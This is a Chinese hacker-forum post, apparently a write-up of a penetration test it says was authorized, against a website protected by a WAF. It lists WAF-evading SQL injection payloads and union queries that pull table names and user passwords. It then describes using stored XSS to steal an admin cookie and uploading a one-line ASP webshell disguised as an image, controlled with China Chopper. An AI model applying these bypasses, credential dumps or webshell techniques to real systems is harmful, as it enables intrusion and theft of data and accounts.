记录一次测试

小皮
4400小皮首席执行运营官
技术交流 2019-08-10 21:37:06
4400 技术交流 2019-08-10 21:37:06
目标某某站点:XXXXX
(已授权)



打开站点(这里用baidu.com替代)看了看,左翻翻右翻翻能看到很明显的“注入”点。简单测试一下(and 1=1、1=2),明显waf,注入被拦截。


无论是在CTF比赛中还是在现实项目中,都会遇到各种各样的waf,没有绝对安全的系统,仔细的研究总会发现被“漏掉”的地方。


接下来手工注入,

经测试:


and //不拦截
and a //不拦截
and !//不拦截
and 1 //拦截
可以发现,当and连接数字时waf会进行拦截,因此只需要在数字或者and与数字中间进行干扰即可。


and /*!1=1*/
and--+a%0a1/*!=*/1
and @s1ye:=1/0



联合查询注入
union //不拦截
select //不拦截
union select //拦截
当waf拦截了哪种组合,利用注释加换行即可
      union--+x%0aselect 1,2,3--+
  
      union--+x%0aselect 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+
      发现被拦截,fuzz发现waf会过滤掉函数,以及group_concat(table_name) from,这里去掉from前的空格,database()=>database () 或 database/**/()
                                  

图片:TIM图片20190810212130.png



 

这里也可以利用database()的0x16进制。


读取用户名密码


union--x%0aselect 1,2,group_concat(password)from users
/*/配合注释符/**/有奇效,可自行测试。


以下为整理的waf中可用的系统变量及函数:


@@version/**/
user/**/()
database/**/()
/**/@@version_compile_os
系统变量的注释符放在前后都可。


之后找到后台:admin/Login.asp    登入后台后,白忙活了,是个假后台。
之后来到首页翻翻转转。发现个留言的地方。始于习惯,就想<script>alert(xss)</script>


图片:TIM图片20190810212531.png

      xss漏洞可以利用一波之后刷新了一下;

图片:TIM图片20190810212536.png



又一次触发。。。。。。。。。。。。




哈哈O(∩_∩)O


搞一波之后呢:


                  

图片:TIM图片20190810212724.png






收到cookie   真实后台地址为:admin123/Login.asp  可真是个小机灵鬼。
                                        

图片:TIM图片20190810212853.png







登陆之后开始找上传点


                           

图片:TIM图片20190810212900.png


               经过一波波操作限制只能上传图片。不甘心的我开始搞图片木马,先写个一句话asp木马,转换成图片马。因为直接上传,菜刀是会连接不上的。我又转换成cer格式。

图片:TIM截图20190810213347.png




写上链接和密码。

图片:TIM图片20190810213614.png



本次测试到此结束。
本文标题:记录一次测试
本文作者:小皮
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t3100.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan